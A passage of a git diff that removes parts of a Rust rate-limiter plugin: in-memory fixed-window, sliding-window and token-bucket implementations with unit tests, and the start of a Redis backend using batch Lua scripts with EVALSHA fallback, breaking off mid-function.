Algorithm, - limit: u64, - window_nanos: u64, - now_mono: Nanos, - now_unix: UnixSecs, -) -> KeyState { - match algorithm { - Algorithm::FixedWindow => KeyState::FixedWindow { - count: 0, - window_start: now_mono, - window_start_unix: now_unix, - window_nanos, - }, - Algorithm::SlidingWindow => KeyState::SlidingWindow { - timestamps: VecDeque::new(), - window_nanos, - }, - Algorithm::TokenBucket => KeyState::TokenBucket { - tokens_milli: limit.saturating_mul(1000), - last_refill: now_mono, - }, - } -} - -/// Dispatch to the correct algorithm based on the key state variant. -fn evaluate_state( - state: &mut KeyState, - limit: u64, - window_nanos: u64, - now_mono: Nanos, - now_unix: UnixSecs, -) -> DimResult { - match state { - KeyState::FixedWindow { - count, - window_start, - window_start_unix, - .. - } => fixed_window( - count, - window_start, - window_start_unix, - limit, - window_nanos, - now_mono, - now_unix, - ), - KeyState::SlidingWindow { timestamps, .. } => { - sliding_window(timestamps, limit, window_nanos, now_mono, now_unix) - } - KeyState::TokenBucket { - tokens_milli, - last_refill, - } => token_bucket( - tokens_milli, - last_refill, - limit, - window_nanos, - now_mono, - now_unix, - ), - } -} - -// --------------------------------------------------------------------------- -// Algorithm implementations -// --------------------------------------------------------------------------- - -fn fixed_window( - count: &mut u64, - window_start: &mut Nanos, - window_start_unix: &mut UnixSecs, - limit: u64, - window_nanos: u64, - now_mono: Nanos, - now_unix: UnixSecs, -) -> DimResult { - // Reset if window has elapsed (amortized cleanup, MEM-05). - if now_mono.saturating_sub(*window_start) >= window_nanos { - *count = 0; - *window_start = now_mono; - *window_start_unix = now_unix; - } - - // At least 1 second so reset_timestamp is always in the future, even if - // window_nanos < 1 billion (sub-second window — currently unreachable via - // config parsing but guarded defensively). - let window_secs = (window_nanos / 1_000_000_000).max(1) as i64; - // Constant within a window — matches Python backend behaviour (CORR-02). - let reset_timestamp = *window_start_unix + window_secs; - - if *count < limit { - *count += 1; - let remaining = limit - *count; - DimResult { - allowed: true, - limit, - remaining, - reset_timestamp, - retry_after: None, - } - } else { - let elapsed_nanos = now_mono.saturating_sub(*window_start); - let remaining_nanos = window_nanos.saturating_sub(elapsed_nanos); - let retry_after = (remaining_nanos / 1_000_000_000) as i64; - DimResult { - allowed: false, - limit, - remaining: 0, - reset_timestamp, - retry_after: Some(retry_after.max(1)), - } - } -} - -fn sliding_window( - timestamps: &mut VecDeque, - limit: u64, - window_nanos: u64, - now_mono: Nanos, - now_unix: UnixSecs, -) -> DimResult { - // Evict timestamps older than the window (amortized cleanup). - let cutoff = now_mono.saturating_sub(window_nanos); - while timestamps.front().is_some_and(|&t| t <= cutoff) { - timestamps.pop_front(); - } - - let count = timestamps.len() as u64; - - // Reset timestamp: when the oldest timestamp in the window expires. - // .max(1) on the division result ensures reset_timestamp is always - // strictly in the future, even when the oldest entry expires in < 1 s - // (integer division would otherwise truncate to 0). - let reset_timestamp = if let Some(&oldest) = timestamps.front() { - let nanos_until_oldest_expires = (oldest + window_nanos).saturating_sub(now_mono); - now_unix + (nanos_until_oldest_expires / 1_000_000_000).max(1) as i64 - } else { - // No requests in window — reset is now + window. - now_unix + (window_nanos / 1_000_000_000) as i64 - }; - - if count < limit { - timestamps.push_back(now_mono); - let remaining = limit - count - 1; - DimResult { - allowed: true, - limit, - remaining, - reset_timestamp, - retry_after: None, - } - } else { - // Oldest timestamp expiry = retry_after. - let retry_after = if let Some(&oldest) = timestamps.front() { - let nanos_until = (oldest + window_nanos).saturating_sub(now_mono); - (nanos_until / 1_000_000_000) as i64 - } else { - 1 - }; - DimResult { - allowed: false, - limit, - remaining: 0, - reset_timestamp, - retry_after: Some(retry_after.max(1)), - } - } -} - -fn token_bucket( - tokens_milli: &mut u64, - last_refill: &mut Nanos, - limit: u64, - window_nanos: u64, - now_mono: Nanos, - now_unix: UnixSecs, -) -> DimResult { - // Refill tokens proportional to elapsed time (integer math, CORR-05). - // refill_rate = limit * 1000 tokens per window_nanos nanoseconds. - let elapsed = now_mono.saturating_sub(*last_refill); - if elapsed > 0 { - // tokens_to_add = limit * 1000 * elapsed / window_nanos - let tokens_to_add = (limit as u128 * 1000 * elapsed as u128 / window_nanos as u128) as u64; - *tokens_milli = (*tokens_milli + tokens_to_add).min(limit.saturating_mul(1000)); - *last_refill = now_mono; - } - - let cap_milli = limit.saturating_mul(1000); - - if *tokens_milli >= 1000 { - *tokens_milli -= 1000; - let remaining = *tokens_milli / 1000; - // reset_timestamp: when bucket would next be full if no more requests arrive. - let tokens_needed_milli = cap_milli.saturating_sub(*tokens_milli); - let refill_secs = if tokens_needed_milli == 0 { - 0i64 - } else { - let nanos = (tokens_needed_milli as u128 * window_nanos as u128 - / (limit as u128 * 1000)) as u64; - (nanos / 1_000_000_000).max(1) as i64 - }; - let reset_timestamp = now_unix + refill_secs; - DimResult { - allowed: true, - limit, - remaining, - reset_timestamp, - retry_after: None, - } - } else { - // No token available — compute time until 1 token refills. - let tokens_needed_milli = 1000u128.saturating_sub(*tokens_milli as u128); - let nanos_until_token = - (tokens_needed_milli * window_nanos as u128 / (limit as u128 * 1000)).max(1); - let retry_after = nanos_until_token.div_ceil(1_000_000_000).max(1) as i64; - let reset_timestamp = now_unix + retry_after; - DimResult { - allowed: false, - limit, - remaining: 0, - reset_timestamp, - retry_after: Some(retry_after), - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::config::Algorithm; - - const WINDOW: u64 = 1_000_000_000; // 1 second in nanos - const T0: Nanos = 1_000_000_000_000; // arbitrary start - const T0_UNIX: UnixSecs = 1_000_000; - - fn check(store: &MemoryStore, key: &str, limit: u64, algo: Algorithm, t: Nanos) -> DimResult { - store.check_and_increment( - key, - limit, - WINDOW, - algo, - t, - T0_UNIX + ((t - T0) / 1_000_000_000) as i64, - ) - } - - // --- Fixed window --- - - #[test] - fn fixed_window_allows_up_to_limit() { - let store = MemoryStore::new(); - for _ in 0..3 { - let r = check(&store, "u:a", 3, Algorithm::FixedWindow, T0); - assert!(r.allowed); - } - let r = check(&store, "u:a", 3, Algorithm::FixedWindow, T0); - assert!(!r.allowed); - } - - #[test] - fn fixed_window_resets_after_window() { - let store = MemoryStore::new(); - for _ in 0..3 { - check(&store, "u:b", 3, Algorithm::FixedWindow, T0); - } - // Advance past window - let r = check(&store, "u:b", 3, Algorithm::FixedWindow, T0 + WINDOW + 1); - assert!(r.allowed); - } - - #[test] - fn fixed_window_reset_timestamp_constant_within_window() { - let store = MemoryStore::new(); - let r1 = check(&store, "u:c", 10, Algorithm::FixedWindow, T0); - let r2 = check(&store, "u:c", 10, Algorithm::FixedWindow, T0 + 100_000_000); - assert!(r1.allowed); - assert!(r2.allowed); - // reset_timestamp must be identical across requests in the same window. - assert_eq!(r1.reset_timestamp, r2.reset_timestamp); - assert!(r1.reset_timestamp > T0_UNIX); - } - - #[test] - fn fixed_window_retry_after_at_least_one() { - let store = MemoryStore::new(); - for _ in 0..2 { - check(&store, "u:d", 2, Algorithm::FixedWindow, T0); - } - let r = check(&store, "u:d", 2, Algorithm::FixedWindow, T0); - assert!(!r.allowed); - assert!(r.retry_after.unwrap() >= 1); - } - - // --- Sliding window --- - - #[test] - fn sliding_window_allows_up_to_limit() { - let store = MemoryStore::new(); - for _ in 0..3 { - assert!(check(&store, "sw:a", 3, Algorithm::SlidingWindow, T0).allowed); - } - assert!(!check(&store, "sw:a", 3, Algorithm::SlidingWindow, T0).allowed); - } - - #[test] - fn sliding_window_allows_after_oldest_expires() { - let store = MemoryStore::new(); - check(&store, "sw:b", 3, Algorithm::SlidingWindow, T0); - check( - &store, - "sw:b", - 3, - Algorithm::SlidingWindow, - T0 + 100_000_000, - ); - check( - &store, - "sw:b", - 3, - Algorithm::SlidingWindow, - T0 + 200_000_000, - ); - // Blocked at T0 - assert!( - !check( - &store, - "sw:b", - 3, - Algorithm::SlidingWindow, - T0 + 500_000_000 - ) - .allowed - ); - // Oldest (T0) expires after WINDOW; T0 + WINDOW + 1 > T0 + WINDOW - assert!(check(&store, "sw:b", 3, Algorithm::SlidingWindow, T0 + WINDOW + 1).allowed); - } - - #[test] - fn sliding_window_no_boundary_burst() { - // With fixed window you could get 2N at the boundary. - // Sliding window prevents this: N requests just before window end, - // then N at window start should still block. - let store = MemoryStore::new(); - let mid = T0 + WINDOW / 2; - for _ in 0..3 { - check(&store, "sw:c", 3, Algorithm::SlidingWindow, mid); - } - // Just after window start, the mid-window requests are still in range. - let r = check(&store, "sw:c", 3, Algorithm::SlidingWindow, T0 + WINDOW + 1); - // mid timestamps expire at mid + WINDOW = T0 + WINDOW/2 + WINDOW - // T0 + WINDOW + 1 < T0 + 3*WINDOW/2, so they're still in range → blocked - assert!(!r.allowed); - } - - // --- Token bucket --- - - #[test] - fn token_bucket_allows_up_to_capacity() { - let store = MemoryStore::new(); - for _ in 0..3 { - assert!(check(&store, "tb:a", 3, Algorithm::TokenBucket, T0).allowed); - } - assert!(!check(&store, "tb:a", 3, Algorithm::TokenBucket, T0).allowed); - } - - #[test] - fn token_bucket_refills_over_time() { - let store = MemoryStore::new(); - // Exhaust 3-token bucket - for _ in 0..3 { - check(&store, "tb:b", 3, Algorithm::TokenBucket, T0); - } - // Wait full window — should refill to capacity - let r = check(&store, "tb:b", 3, Algorithm::TokenBucket, T0 + WINDOW); - assert!(r.allowed); - } - - #[test] - fn token_bucket_integer_math_no_overflow() { - let store = MemoryStore::new(); - // Large limit — should not overflow u64 - let r = check(&store, "tb:c", u64::MAX / 1001, Algorithm::TokenBucket, T0); - assert!(r.allowed); - } - - #[test] - fn token_bucket_reset_timestamp_strictly_greater_than_now() { - let store = MemoryStore::new(); - let r = check(&store, "tb:d", 10, Algorithm::TokenBucket, T0); - assert!(r.allowed); - assert!(r.reset_timestamp > T0_UNIX); - } - - // --- Key isolation --- - - #[test] - fn different_keys_have_independent_counters() { - let store = MemoryStore::new(); - for _ in 0..3 { - check(&store, "u:x", 3, Algorithm::FixedWindow, T0); - } - // Different key must still be allowed - let r = check(&store, "u:y", 3, Algorithm::FixedWindow, T0); - assert!(r.allowed); - } - - // --- Sweep (MEM-06) --- - - #[test] - fn sweep_evicts_stale_fixed_window_keys() { - let store = MemoryStore::new(); - check(&store, "sweep:fw", 3, Algorithm::FixedWindow, T0); - assert_eq!(store.inner.read().len(), 1); - - // Advance just past window_nanos (WINDOW = 1 s) — fixed-window eviction - // uses the per-key window duration, not TOKEN_BUCKET_STALE_NANOS. - let stale_time = T0 + WINDOW + 1; - store.sweep(stale_time); - assert_eq!( - store.inner.read().len(), - 0, - "stale fixed window key must be evicted" - ); - } - - #[test] - fn sweep_evicts_empty_sliding_window_keys() { - let store = MemoryStore::new(); - // Create a sliding window entry then advance past the window so - // the per-access cleanup drains the deque. - check(&store, "sweep:sw", 3, Algorithm::SlidingWindow, T0); - assert_eq!(store.inner.read().len(), 1); - - // Access after window elapses — the per-access cutoff drains all timestamps. - check( - &store, - "sweep:sw", - 3, - Algorithm::SlidingWindow, - T0 + WINDOW + 1, - ); - // Deque now has one fresh entry; sweep should keep it. - store.sweep(T0 + WINDOW + 1); - assert_eq!( - store.inner.read().len(), - 1, - "active sliding window key must be kept" - ); - - // Advance far enough that a sweep after window drain would evict. - let far_future = T0 + WINDOW * 100; - // Access once to create a timestamp, then advance past its window. - check(&store, "sweep:sw2", 1, Algorithm::SlidingWindow, T0); - let after_window = T0 + WINDOW + 1; - // This access drains T0, adds after_window. - check( - &store, - "sweep:sw2", - 1, - Algorithm::SlidingWindow, - after_window, - ); - // Now advance far past, access to drain the deque with a blocked request. - let _ = check(&store, "sweep:sw2", 1, Algorithm::SlidingWindow, far_future); - // The above drains old entries and adds one new one; next access after that window: - let very_far = far_future + WINDOW + 1; - // This drains the far_future entry (outside window) — but adds a new one. - // We need the deque truly empty: exhaust limit then wait. - // Simpler: call sweep directly and check that a key with empty deque gets evicted. - // Manually construct this scenario: - { - let read = store.inner.read(); - if let Some(lock) = read.get("sweep:sw2") { - let mut state = lock.write(); - if let KeyState::SlidingWindow { timestamps, .. } = &mut *state { - timestamps.clear(); - } - } - } - store.sweep(very_far); - assert!( - store.inner.read().get("sweep:sw2").is_none(), - "sliding window key with empty deque must be evicted" - ); - } - - #[test] - fn sweep_evicts_stale_token_bucket_keys() { - let store = MemoryStore::new(); - check(&store, "sweep:tb", 3, Algorithm::TokenBucket, T0); - assert_eq!(store.inner.read().len(), 1); - - let stale_time = T0 + super::TOKEN_BUCKET_STALE_NANOS + 1; - store.sweep(stale_time); - assert_eq!( - store.inner.read().len(), - 0, - "stale token bucket key must be evicted" - ); - } - - #[test] - fn sweep_keeps_active_keys() { - let store = MemoryStore::new(); - check(&store, "sweep:active", 10, Algorithm::FixedWindow, T0); - // Sweep at a time within the window — key should be kept. - // WINDOW is 1s; sweep 500ms later (still inside the window). - store.sweep(T0 + 500_000_000); - assert_eq!( - store.inner.read().len(), - 1, - "active key must not be evicted" - ); - } -} diff --git a/plugins_rust/rate_limiter/src/redis_backend.rs b/plugins_rust/rate_limiter/src/redis_backend.rs deleted file mode 100644 index 724d580dc6..0000000000 --- a/plugins_rust/rate_limiter/src/redis_backend.rs +++ /dev/null @@ -1,660 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Redis backend for the rate limiter engine. -// -// Holds a lazily-created multiplexed async Redis connection. -// Fires the same batch Lua scripts as the Python RedisBackend — one call per -// evaluate_many() invocation regardless of dimension count (REDIS-01/03). -// Uses EVALSHA with NOSCRIPT fallback to EVAL (REDIS-02). -// -// Key format: `{prefix}:{dimension_key}:{window_seconds}` -// This matches the Python RedisBackend key format exactly so that instances -// running the Rust backend and instances running the Python fallback share the -// same Redis counters during a rolling upgrade. - -use std::cmp::max; -use std::sync::OnceLock; -use std::sync::atomic::{AtomicU64, Ordering}; - -use parking_lot::Mutex; -use redis::aio::MultiplexedConnection; -use tokio::runtime::{Builder, Handle, Runtime}; - -use crate::config::Algorithm; -use crate::types::DimResult; - -// --------------------------------------------------------------------------- -// Batch Lua scripts — identical to Python RedisBackend._LUA_BATCH_* constants -// -// INVARIANT (rolling-upgrade compatibility): -// These scripts and the key format ({prefix}:{dimension_key}:{window_seconds}) -// MUST stay in sync with the Python RedisBackend in -// plugins/rate_limiter/rate_limiter.py. Both implementations share the same -// Redis counters so that mixed Rust/Python deployments enforce a single set -// of limits during a rolling upgrade. -// -// If you change a script or the key format here, update the Python copy and -// validate with the test_redis_key_format_parity_* tests. -// -// LIMITATION: The Rust path derives `now_float` from `now_unix as f64` -// (whole-second precision) while the Python path passes raw `time.time()` -// (sub-second precision). During a mixed rolling upgrade, sorted-set -// members will have different precision levels for the same logical -// timestamp. The functional impact is at most 1 second on response -// headers — rate enforcement correctness is unaffected. -// --------------------------------------------------------------------------- -// -// LIMITATION: Batch scripts pass multiple KEYS (one per dimension) in a -// single EVAL/EVALSHA call. In Redis Cluster, all keys must hash to the -// same slot. The key format `{prefix}:{dim}:{window}` does NOT use hash -// tags, so these scripts will fail on Redis Cluster. Use standalone Redis -// or Sentinel for multi-dimension batch evaluation. -// --------------------------------------------------------------------------- - -const LUA_BATCH_FIXED: &str = r#" -local results = {} -for i = 1, #KEYS do - local current = redis.call('INCR', KEYS[i]) - if current == 1 then - redis.call('EXPIRE', KEYS[i], ARGV[i]) - end - local ttl = redis.call('TTL', KEYS[i]) - results[i] = {current, ttl} -end -return results -"#; - -const LUA_BATCH_SLIDING: &str = r#" -local now = tonumber(ARGV[1]) -local results = {} -for i = 1, #KEYS do - local base = 1 + (i-1)*3 + 1 - local window = tonumber(ARGV[base]) - local limit = tonumber(ARGV[base+1]) - local member = ARGV[base+2] - local cutoff = now - window - redis.call('ZREMRANGEBYSCORE', KEYS[i], '-inf', cutoff) - local count = tonumber(redis.call('ZCARD', KEYS[i])) - redis.call('EXPIRE', KEYS[i], window + 1) - if count >= limit then - local oldest = redis.call('ZRANGE', KEYS[i], 0, 0, 'WITHSCORES') - local oldest_ts = 0 - if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end - results[i] = {0, count, oldest_ts} - else - redis.call('ZADD', KEYS[i], now, member) - count = count + 1 - local oldest = redis.call('ZRANGE', KEYS[i], 0, 0, 'WITHSCORES') - local oldest_ts = 0 - if #oldest > 0 then oldest_ts = tonumber(oldest[2]) end - results[i] = {1, count, oldest_ts} - end -end -return results -"#; - -// NOTE: Lua uses floating-point arithmetic for token refill (tokens + elapsed * rate), -// while the in-memory Rust backend uses integer milli-token math (u128). Under sustained -// high-frequency traffic the two may diverge by ±1 token due to float precision loss. -// This is acceptable for rate limiting — the behavioral contract is identical. -const LUA_BATCH_TOKEN_BUCKET: &str = r#" -local now = tonumber(ARGV[1]) -local results = {} -for i = 1, #KEYS do - local base = 1 + (i-1)*2 + 1 - local capacity = tonumber(ARGV[base]) - local rate = tonumber(ARGV[base+1]) - local data = redis.call('HMGET', KEYS[i], 'tokens', 'last_refill') - local tokens = tonumber(data[1]) - local last_refill = tonumber(data[2]) - if tokens == nil then - tokens = capacity - 1 - redis.call('HSET', KEYS[i], 'tokens', tokens, 'last_refill', now) - local ttl = math.ceil(capacity / rate) + 1 - redis.call('EXPIRE', KEYS[i], ttl) - results[i] = {1, math.floor(tokens), 0} - else - local elapsed = now - last_refill - tokens = math.min(capacity, tokens + elapsed * rate) - local allowed, time_to_next - if tokens >= 1.0 then - tokens = tokens - 1.0 - allowed = 1 - time_to_next = 0 - else - allowed = 0 - time_to_next = math.ceil((1.0 - tokens) / rate) - end - redis.call('HSET', KEYS[i], 'tokens', tokens, 'last_refill', now) - local ttl = math.ceil((capacity - tokens) / rate) + 1 - redis.call('EXPIRE', KEYS[i], ttl) - results[i] = {allowed, math.floor(tokens), time_to_next} - end -end -return results -"#; - -// --------------------------------------------------------------------------- -// Unique member counter for sliding window sorted sets -// --------------------------------------------------------------------------- - -static MEMBER_CTR: AtomicU64 = AtomicU64::new(0); - -/// Process-unique PID, cached once. -fn process_id() -> u32 { - static PID: OnceLock = OnceLock::new(); - *PID.get_or_init(std::process::id) -} - -/// Random nonce generated once at process start. Combined with PID and atomic -/// counter this guarantees unique sorted-set members across gateway replicas -/// even in containerized environments where PID 1 is common, preventing ZADD -/// overwrites that would cause undercounting. -fn instance_nonce() -> u64 { - static NONCE: OnceLock = OnceLock::new(); - *NONCE.get_or_init(|| { - use std::collections::hash_map::DefaultHasher; - use std::hash::{Hash, Hasher}; - let mut h = DefaultHasher::new(); - std::time::SystemTime::now() - .duration_since(std::time::UNIX_EPOCH) - .unwrap_or_default() - .as_nanos() - .hash(&mut h); - std::process::id().hash(&mut h); - h.finish() - }) -} - -fn unique_member(now: f64) -> String { - use std::fmt::Write; - let n = MEMBER_CTR.fetch_add(1, Ordering::Relaxed); - let mut buf = String::with_capacity(60); - let _ = write!( - buf, - "{:.6}:{}:{}:{}", - now, - process_id(), - instance_nonce(), - n - ); - buf -} - -// --------------------------------------------------------------------------- -// Value extraction helpers -// --------------------------------------------------------------------------- - -fn val_i64(v: &redis::Value) -> i64 { - match v { - redis::Value::Int(i) => *i, - redis::Value::BulkString(b) => std::str::from_utf8(b) - .ok() - .and_then(|s| s.parse().ok()) - .unwrap_or_else(|| { - log::error!("Redis returned unparseable i64 BulkString; defaulting to 0"); - 0 - }), - other => { - log::error!( - "Redis returned unexpected value type for i64: {:?}; defaulting to 0", - other - ); - 0 - } - } -} - -fn val_f64(v: &redis::Value) -> f64 { - match v { - redis::Value::Int(i) => *i as f64, - redis::Value::BulkString(b) => std::str::from_utf8(b) - .ok() - .and_then(|s| s.parse().ok()) - .unwrap_or_else(|| { - log::error!("Redis returned unparseable f64 BulkString; defaulting to 0.0"); - 0.0 - }), - other => { - log::error!( - "Redis returned unexpected value type for f64: {:?}; defaulting to 0.0", - other - ); - 0.0 - } - } -} - -fn inner_array(outer: &redis::Value, i: usize) -> Option<&Vec> { - match outer { - redis::Value::Array(a) => match a.get(i) { - Some(redis::Value::Array(inner)) => Some(inner), - _ => None, - }, - _ => None, - } -} - -// --------------------------------------------------------------------------- -// RedisRateLimiter -// --------------------------------------------------------------------------- - -pub struct RedisRateLimiter { - client: redis::Client, - conn: Mutex>, - algorithm: Algorithm, - prefix: String, - /// Cached SHA for the active algorithm's batch Lua script (REDIS-02). - /// Populated on first use via SCRIPT LOAD; cleared on connection reset. - script_sha: Mutex>, -} - -fn shared_runtime() -> Result<&'static Runtime, redis::RedisError> { - static RUNTIME: OnceLock> = OnceLock::new(); - let result = RUNTIME.get_or_init(|| { - Builder::new_multi_thread() - .worker_threads(2) - .enable_all() - .build() - .map_err(|e| e.to_string()) - }); - match result { - Ok(rt) => Ok(rt), - Err(msg) => Err(redis::RedisError::from(( - redis::ErrorKind::IoError, - "tokio runtime init failed", - msg.clone(), - ))), - } -} - -impl RedisRateLimiter { - pub fn new( - redis_url: &str, - algorithm: Algorithm, - prefix: String, - ) -> Result { - let client = redis::Client::open(redis_url)?; - Ok(Self { - client, - conn: Mutex::new(None), - algorithm, - prefix, - script_sha: Mutex::new(None), - }) - } - - async fn connection_async(&self) -> Result { - { - let conn_guard = self.conn.lock(); - if let Some(conn) = conn_guard.as_ref() { - return Ok(conn.clone()); - } - } - - // Timeout prevents blocking the gateway thread indefinitely when - // Redis is unreachable (network partition, DNS failure, etc.). - let conn = tokio::time::timeout( - std::time::Duration::from_secs(5), - self.client.get_multiplexed_tokio_connection(), - ) - .await - .map_err(|_| { - redis::RedisError::from(( - redis::ErrorKind::IoError, - "Redis connection timed out after 5 s", - )) - })??; - - let mut conn_guard = self.conn.lock(); - if let Some(existing) = conn_guard.as_ref() { - return Ok(existing.clone()); - } - *conn_guard = Some(conn.clone()); - Ok(conn) - } - - fn reset_connection(&self) { - log::warn!("Redis connection reset after error; will reconnect on next request"); - *self.conn.lock() = None; - *self.script_sha.lock() = None; - } - - /// Return the batch Lua script for the active algorithm. - fn batch_script(&self) -> &'static str { - match self.algorithm { - Algorithm::FixedWindow => LUA_BATCH_FIXED, - Algorithm::SlidingWindow => LUA_BATCH_SLIDING, - Algorithm::TokenBucket => LUA_BATCH_TOKEN_BUCKET, - } - } - - /// REDIS-02: Load the active algorithm's script via SCRIPT LOAD and cache - /// the SHA. Returns the cached SHA on subsequent calls. - async fn ensure_script_loaded( - &self, - conn: &mut MultiplexedConnection, - ) -> Result { - { - let guard = self.script_sha.lock(); - if let Some(sha) = guard.as_ref() { - return Ok(sha.clone()); - } - } - let sha: String = redis::cmd("SCRIPT") - .arg("LOAD") - .arg(self.batch_script()) - .query_async(conn) - .await?; - *self.script_sha.lock() = Some(sha.clone()); - Ok(sha) - } - - /// REDIS-02: Execute via EVALSHA when the SHA is cached; fall back to EVAL - /// on NOSCRIPT (Redis restarted and flushed its script cache). - async fn evalsha_or_eval( - &self, - conn: &mut MultiplexedConnection, - num_keys: usize, - keys: &[String], - args: &[Vec], - ) -> Result { - // Try EVALSHA if we have a cached SHA. - if let Ok(sha) = self.ensure_script_loaded(conn).await { - let mut cmd = redis::cmd("EVALSHA"); - cmd.arg(&sha).arg(num_keys); - for k in keys { - cmd.arg(k.as_bytes()); - } - for a in args { - cmd.arg(a.as_slice()); - } - match cmd.query_async::(conn).await { - Ok(val) => return Ok(val), - Err(e) if e.kind() == redis::ErrorKind::NoScriptError => { - // NOSCRIPT — clear cached SHA, fall through to EVAL. - *self.script_sha.lock() = None; - } - Err(e) => return Err(e), - } - } - - // Fallback: full EVAL (first call or after NOSCRIPT). - let mut cmd = redis::cmd("EVAL"); - cmd.arg(self.batch_script()).arg(num_keys); - for k in keys { - cmd.arg(k.as_bytes()); - } - for a in args { - cmd.arg(a.as_slice()); - } - let result: redis::Value = cmd.query_async(conn).await?; - - // Re-cache SHA for next call. - let _ = self.ensure_script_loaded(conn).await; - - Ok(result) - } - - /// Evaluate all dimension checks in a single Redis call. - /// - /// `checks` is `(dimension_key, limit_count, window_nanos)` — same shape - /// as the memory engine. Returns one `DimResult` per check. - pub fn evaluate_many( - &self, - checks: &[(String, u64, u64)], - now_unix: i64, - ) -> Result, redis::RedisError> { - // Guard: block_on from within an existing Tokio runtime panics. - // Return a clear error instead of crashing the Python process. - if Handle::try_current().is_ok() { - return Err(redis::RedisError::from(( - redis::ErrorKind::IoError, - "evaluate_many (sync) called from within a Tokio runtime; use evaluate_many_async instead", - ))); - } - shared_runtime()?.block_on(self.evaluate_many_async(checks, now_unix)) - } - - pub async fn evaluate_many_async( - &self, - checks: &[(String, u64, u64)], - now_unix: i64, - ) -> Result, redis::RedisError> { - if checks.is_empty() { - return Ok(vec![]); - } - - // Derive from the passed-in now_unix so Python time mocks propagate - // to Redis Lua scripts (CORR-02). - let now_float = now_unix as f64; - - let mut conn = self.connection_async().await?; - let result = match self.algorithm { - Algorithm::FixedWindow => self.eval_fixed(&mut conn, checks, now_unix).await, - Algorithm::SlidingWindow => { - self.eval_sliding(&mut conn, checks, now_float, now_unix) - .await - } - Algorithm::TokenBucket => { - self.eval_token_bucket(&mut conn, checks, now_float, now_unix) - .await - } - }; - if let Err(ref e) = result { - // Only reset the multiplexed connection on transport-level errors. - // Script/type errors are recoverable without dropping in-flight requests. - if matches!( - e.kind(), - redis::ErrorKind::IoError - | redis::ErrorKind::BusyLoadingError - | redis::ErrorKind::TryAgain - ) { - self.reset_connection(); - } - } - result - } - - fn redis_key(&self, dim_key: &str, window_nanos: u64) -> String { - let window_secs = (window_nanos / 1_000_000_000).max(1); - format!("{}:{}:{}", self.prefix, dim_key, window_secs) - } - - fn token_bucket_time_to_full(limit: u64, remaining: u64, window_nanos: u64) -> i64 { - if remaining >= limit { - return 0; - } - let window_secs = window_nanos as f64 / 1_000_000_000.0; - let refill_rate = limit as f64 / window_secs; - let tokens_needed = limit - remaining; - max(1, (tokens_needed as f64 / refill_rate) as i64) - } - - // --- Fixed window --- - - async fn eval_fixed( - &self, - conn: &mut MultiplexedConnection, - checks: &[(String, u64, u64)], - now_unix: i64, - ) -> Result, redis::RedisError> { - let keys: Vec = checks - .iter() - .map(|(k, _, w)| self.redis_key(k, *w)) - .collect(); - let args: Vec> = checks - .iter() - .map(|(_, _, w)| format!("{}", (w / 1_000_000_000).max(1)).into_bytes()) - .collect(); - - let raw = self.evalsha_or_eval(conn, keys.len(), &keys, &args).await?; - let mut results = Vec::with_capacity(checks.len()); - - for (i, (_, limit, _)) in checks.iter().enumerate() { - let inner = inner_array(&raw, i).ok_or_else(|| { - redis::RedisError::from((redis::ErrorKind::TypeError, "expected inner array")) - })?; - let count = val_i64(inner.first().unwrap_or(&redis::Value::Int(0))) as u64; - let ttl = val_i64(inner.get(1).unwrap_or(&redis::Value::Int(0))); - let reset_timestamp = now_unix + ttl.max(0); - - if count > *limit { - results.push(DimResult { - allowed: false, - limit: *limit, - remaining: 0, - reset_timestamp, - retry_after: Some(ttl.max(1)), - }); - } else { - results.push(DimResult { - allowed: true, - limit: *limit, - remaining: limit - count, - reset_timestamp, - retry_after: None, - }); - } - } - Ok(results) - } - - // --- Sliding window --- - - async fn eval_sliding( - &self, - conn: &mut MultiplexedConnection, - checks: &[(String, u64, u64)], - now_float: f64, - now_unix: i64, - ) -> Result, redis::RedisError> { - let keys: Vec = checks - .iter() - .map(|(k, _, w)| self.redis_key(k, *w)) - .collect(); - - let mut args: Vec> = vec![format!("{}", now_float).into_bytes()]; - for (_, limit, window_nanos) in checks { - let window_secs = (window_nanos / 1_000_000_000).max(1); - args.push(format!("{}", window_secs).into_bytes()); - args.push(format!("{}", limit).into_bytes()); - args.push(unique_member(now_float).into_bytes()); - } - - let raw = self.evalsha_or_eval(conn, keys.len(), &keys, &args).await?; - let mut results = Vec::with_capacity(checks.len()); - - for (i, (_, limit, window_nanos)) in checks.iter().enumerate() { - let inner = inner_array(&raw, i).ok_or_else(|| { - redis::RedisError::from((redis::ErrorKind::TypeError, "expected inner array")) - })?; - let allowed_int = val_i64(inner.first().unwrap_or(&redis::Value::Int(0))); - let count = val_i64(inner.get(1).unwrap_or(&redis::Value::Int(0))) as u64; - let oldest_ts = val_f64(inner.get(2).unwrap_or(&redis::Value::Int(0))); - let window_secs = (window_nanos / 1_000_000_000) as f64; - let reset_timestamp = (oldest_ts + window_secs) as i64; - let reset_in = (reset_timestamp - now_unix).max(1); - - if allowed_int == 0 { - results.push(DimResult { - allowed: false, - limit: *limit, - remaining: 0, - reset_timestamp, - retry_after: Some(reset_in), - }); - } else { - results.push(DimResult { - allowed: true, - limit: *limit, - remaining: limit.saturating_sub(count), - reset_timestamp, - retry_after: None, - }); - } - } - Ok(results) - } - - // --- Token bucket --- - - async fn eval_token_bucket( - &self, - conn: &mut MultiplexedConnection, - checks: &[(String, u64, u64)], - now_float: f64, - now_unix: i64, - ) -> Result, redis::RedisError> { - let keys: Vec = checks - .iter() - .map(|(k, _, w)| self.redis_key(k, *w)) - .collect(); - - let mut args: Vec> = vec![format!("{}", now_float).into_bytes()]; - for (_, limit, window_nanos) in checks { - let window_secs = *window_nanos as f64 / 1_000_000_000.0; - let rate = *limit as f64 / window_secs; - args.push(format!("{}", limit).into_bytes()); - args.push(format!("{}", rate).into_bytes()); - } - - let raw = self.evalsha_or_eval(conn, keys.len(), &keys, &args).await?; - let mut results = Vec::with_capacity(checks.len()); - - for (i, (_, limit, window_nanos)) in checks.iter().enumerate() { - let inner = inner_array(&raw, i).ok_or_else(|| { - redis::RedisError::from((redis::ErrorKind::TypeError, "expected inner array")) - })?; - let allowed_int = val_i64(inner.first().unwrap_or(&redis::Value::Int(0))); - let remaining = val_i64(inner.get(1).unwrap_or(&redis::Value::Int(0))) as u64; - let time_to_next = val_i64(inner.get(2).unwrap_or(&redis::Value::Int(0))); - - if allowed_int == 0 { - let reset_timestamp = now_unix + time_to_next.max(1); - results.push(DimResult { - allowed: false, 